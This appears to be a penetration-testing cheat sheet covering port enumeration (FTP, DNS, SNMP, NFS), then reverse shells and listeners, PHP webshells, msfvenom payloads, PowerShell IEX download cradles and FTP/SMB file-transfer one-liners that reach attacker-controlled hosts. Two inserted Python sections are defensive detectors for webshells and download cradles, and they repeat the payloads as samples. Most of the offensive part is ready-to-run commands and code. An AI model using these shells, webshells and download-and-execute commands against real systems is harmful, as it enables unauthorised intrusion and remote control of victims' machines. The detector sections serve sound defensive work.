Automated nmap scanning (my preference is nmapAutomator, never missed a port)
```shell
# It is recommended to scan ONE IP at a time
# Do NOT overload the network
# All scans, consecutively: Quick, Targeted, UDP, All ports, Vuln scan, CVE scan, Gobuster, Nikto
nmapAutomator ip All
```
Banner Grabbing
```shell
telnet ip port
nc -nv ip port
curl -iv $ip
```
Port 21 - FTP
Nmap script scanning - will reveal anonymous access
```shell
nmap -Pn -n -vvv -p21 -sC -sV $ip
```
Checking anonymous access manually
```shell
ftp ip
ftp> USER anonymous
ftp> PASS anonymous
```
Easy view of FTP content - Browse to:
```
ftp://$ip
```
Uploading a binary or webshell
```shell
ftp> binary
ftp> put file/name
```
Port 22 - SSH
Additional banner grabbing
```shell
ssh root@$ip
```
Port 53 - DNS
```shell
# Get nameservers and domain name of the IP address
nslookup
nslookup> server $target_ip
nslookup> $target
# o/p: ns1.example.com

# Get all sub-domains
host -l -a example.com $target_ip # or ns1.example.com
```
Use Wappalyzer to identify technologies, web server, OS, database server deployed
View-Source of pages to find interesting comments, directories, technologies, web application being used, etc.
Finding hidden content
Scanning each sub-domain and interesting directory is a good idea
```shell
# Use small common wordlist first
# Use big wordlist next
# Use CMS specific wordlist if one is found
gobuster dir -u http://$ip -w /wordlist -o gobust.out
# Find technology specific content
gobuster dir -u http://$ip -w /wordlist -o gobust_php.out -x php
# Find hidden notes, readme, changelog
gobuster dir -u http://$ip -w /wordlist -o gobust_txt.out -x txt
```
Files to browse manually
```
/robots.txt
/sitemap.xml
# Make it throw an error
/doesnotexist
```
List shares
Note: smbmap will state the access type available, smbclient will NOT. To check the access type using smbclient, it's best to access each share, read a file, and write a file.
```shell
# Brute force community strings
# echo public > community
# echo private >> community
# echo manager >> community
# for ip in $(seq 1 254); do echo 10.11.1.$ip; done > snmp-ips
onesixtyone -c community -i snmp-ips
```
```shell
# Enumerate entire MIB tree
snmpwalk -c public -v1 $ip
# Enumerate specific MIB value
snmpwalk -c public -v1 $ip $MIB_Value
```
```shell
snmp-check $ip
```
Port 2049 - NFS
```shell
# NFS < v4
# Enumerating shares available, and mount points
showmount -e $ip
showmount -a $ip

# Mounting, x = NFS version
mount -t nfs -o vers=x $ip:<share> <local_dir>

# On target machine
# Lists mount points restricted with nosuid/noexec; any mount NOT listed allows SUID programs and scripts to run from it
mount | grep 'nosuid\|noexec'
```
Shells / Payloads
Universal Listeners
```shell
# Netcat
[sudo] rlwrap nc -nvlp <port>

# msf multi/handler
msf(exploit/multi/handler)> set payload path/to/payload
msf(exploit/multi/handler)> set LHOST <ip> # or <interface>
msf(exploit/multi/handler)> set LPORT <port>
```
PowerShell reverse shell available here
PHP reverse shell available here
Netcat for Windows available here
```shell
# PowerShell
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1
vi shell.ps1
# go to end of file, paste the following
Invoke-PowerShellTcp -Reverse -IPAddress [attacker_ip] -Port [attacker_port]
# close, reverse shell ready to use

# Netcat - use x64 or x32 as per target. powershell.exe or cmd.exe
nc.exe x.x.x.x <port> -e powershell.exe
```
PHP Webshells
```
# Basic. system() or shell_exec() or exec()
<?php system($_GET['cmd']); ?>

# More functional
<?php
$ip = 'http://10.10.14.4/'; # [:port] . Change this
# Upload
if (isset($_GET['fupload'])) {
    file_put_contents($_GET['fupload'], file_get_contents($ip . $_GET['fupload']));
};
# Execute code
# shell_exec() or system() or exec()
if (isset($_GET['cmd'])) {
    echo "<pre>" . exec($_GET['cmd']) . "</pre>";
};
?>

# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f war -o shell.war
```
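As an added example (not part of the original cheat sheet), a small static scanner that flags the request-parameter-to-command-sink flow the webshells above depend on, so a defender can sweep a web root for files of that shape. The PHP samples are constructed inline, and the regexes are an assumption about common webshell forms, not a full PHP parser.

```python
import re
from typing import List, Tuple

# Execution sinks a webshell of the kind shown above typically calls.
SINKS = r"(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
# Request-controlled superglobals; anything flowing from these into a sink is attacker input.
SOURCES = r"\$_(GET|POST|REQUEST|COOKIE)\b"

# sink( ... $_GET[...] ... ) within one statement (stops at ';' to limit false positives)
SINK_WITH_SOURCE = re.compile(rf"\b{SINKS}\s*\(([^;]*?){SOURCES}", re.IGNORECASE)
# file_put_contents(<request-controlled path>, ...) : the "upload" half of the dropper shell
DROPPER = re.compile(rf"\bfile_put_contents\s*\(\s*{SOURCES}", re.IGNORECASE)


def scan_php_source(src: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, sink, source) for every request-to-sink flow found."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), start=1):
        for m in SINK_WITH_SOURCE.finditer(line):
            findings.append((lineno, m.group(1).lower(), "$_" + m.group(3).upper()))
        for m in DROPPER.finditer(line):
            findings.append((lineno, "file_put_contents", "$_" + m.group(1).upper()))
    return findings


# Constructed sample files (assumed content, not taken from any real system).
SAMPLES = {
    "basic.php": "<?php system($_GET['cmd']);?>\n",
    "dropper.php": (
        "<?php\n"
        "$ip = 'http://192.0.2.10/';\n"
        "if (isset($_GET['fupload'])) {\n"
        "    file_put_contents($_GET['fupload'], file_get_contents($ip . $_GET['fupload']));\n"
        "};\n"
        "if (isset($_GET['cmd'])) {\n"
        "    echo \"<pre>\" . exec($_GET['cmd']) . \"</pre>\";\n"
        "};\n"
        "?>\n"
    ),
    # Benign: a sink with a constant argument and a request parameter that never reaches a sink.
    "benign.php": (
        "<?php\n"
        "$listing = shell_exec('ls -la /var/www/uploads');\n"
        "echo htmlspecialchars($_GET['page'] ?? 'home');\n"
        "?>\n"
    ),
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, scan_php_source(src))
```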
Shellcode
Select appropriate architecture
```shell
# Linux Staged - use python or c
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f python
# Linux Stageless - use python or c
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f python

# Windows Staged - use python or c
msfvenom -p windows/x64/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f python
# Windows Stageless - use python or c
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f python
```
Upgrading your shell - Linux
Upon initial access, it is crucial to achieve the highest functional shell possible for privesc purposes!
```shell
# On victim machine
which python[3]
python[3] -c 'import pty;pty.spawn("/bin/bash")'
# background the listener using ctrl+z
stty -a # notice the number of rows and columns
stty raw -echo
# foreground the process: type fg, press enter
stty rows xx
stty columns xxx
export TERM=xterm-256color
```
```powershell
# Does not save file on the system
powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<ip>/<file_name>')"
# Saves file on the system
powershell.exe -nop -ep bypass -c "iwr -uri http://<ip>/<file_name> -outfile path/to/save/file_name"
# DownloadFile() returns nothing, so there is nothing for IEX to run; the call alone saves the file
powershell.exe -nop -ep bypass -c "(New-Object Net.WebClient).DownloadFile('http://<ip>/<file_name>','path/to/save/file_name')"
```
```powershell
echo $storageDir = $pwd >> wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
# Download file from
echo $url = "http://<ip>/file_name" >> wget.ps1
# Save file as
echo $file = "file_name" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
# execute the script as follows
powershell.exe -nop -ep bypass -nol -noni -f wget.ps1
```
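As an added example (not part of the original cheat sheet), the detection side of the download cradles above: a triage function that scores process command lines for the combination of a remote fetch with in-memory execution or an execution-policy bypass. The events are constructed, the indicator names are my own, and the parameter abbreviations matched (-nop, -ep, -noni) are the ones the commands above use.

```python
import re
from typing import Dict, List, Set, Tuple

# Each indicator is a case-insensitive regex over the full command line.
INDICATORS: Dict[str, re.Pattern] = {
    "policy_bypass": re.compile(r"-(ep|ex|exec|executionpolicy)\s+bypass", re.I),
    "no_profile": re.compile(r"-nop(rofile)?\b", re.I),
    "non_interactive": re.compile(r"-noni(nteractive)?\b", re.I),
    "remote_fetch": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "in_memory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "writes_to_disk": re.compile(r"DownloadFile|-outfile", re.I),
}


def indicators_for(cmdline: str) -> Set[str]:
    return {name for name, rx in INDICATORS.items() if rx.search(cmdline)}


def is_download_cradle(cmdline: str) -> bool:
    """A remote fetch on its own is normal admin activity; flag it only when it is
    paired with in-memory execution (IEX) or an execution-policy bypass."""
    ind = indicators_for(cmdline)
    return "remote_fetch" in ind and bool({"in_memory_exec", "policy_bypass"} & ind)


# Constructed process-creation events (pid, command line); none are real telemetry.
EVENTS: List[Tuple[int, str]] = [
    (4120, 'powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(\'http://192.0.2.10/run.ps1\')"'),
    (4188, 'powershell.exe -nop -ep bypass -c "iwr -uri http://192.0.2.10/nc.exe -outfile C:\\Users\\Public\\nc.exe"'),
    (4201, 'powershell.exe -nop -ep bypass -c "(New-Object Net.WebClient).DownloadFile(\'http://192.0.2.10/a.exe\',\'C:\\Users\\Public\\a.exe\')"'),
    # Benign: a scheduled script and a signed-policy download with no IEX and no bypass.
    (5010, 'powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\\Scripts\\nightly-backup.ps1'),
    (5022, 'powershell.exe -Command "Invoke-WebRequest -Uri https://updates.example.internal/catalog.json -OutFile C:\\ProgramData\\catalog.json"'),
]


def triage(events: List[Tuple[int, str]]) -> List[Tuple[int, bool, Set[str]]]:
    return [(pid, is_download_cradle(cmd), indicators_for(cmd)) for pid, cmd in events]


if __name__ == "__main__":
    for pid, hit, ind in triage(EVENTS):
        print(pid, "CRADLE" if hit else "ok", sorted(ind))
```

Event 5022 still carries the remote_fetch and writes_to_disk indicators, which is the kind of lower-severity signal worth hunting on separately rather than alerting on.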
TFTP (UDP)
```
tftp -i <ip> get file_name
```
SMB
```
# cmd.exe
net use Z: \\<attacker_ip>\share_name
# To access the drive
Z:

# PowerShell
New-PSDrive -Name "notmalicious" -PSProvider "FileSystem" -Root "\\<attacker_ip>\share_name"
# To access the drive
notmalicious:
```
FTP
```
ftp <ip>
ftp> binary
ftp> get file_name

# One-liner downloader
# in cmd.exe do not use quotes in an echo command
echo open <ip> >> download.txt
echo anonymous >> download.txt
echo anon >> download.txt
echo binary >> download.txt
echo get file_name >> download.txt
echo bye >> download.txt
ftp -s:download.txt
```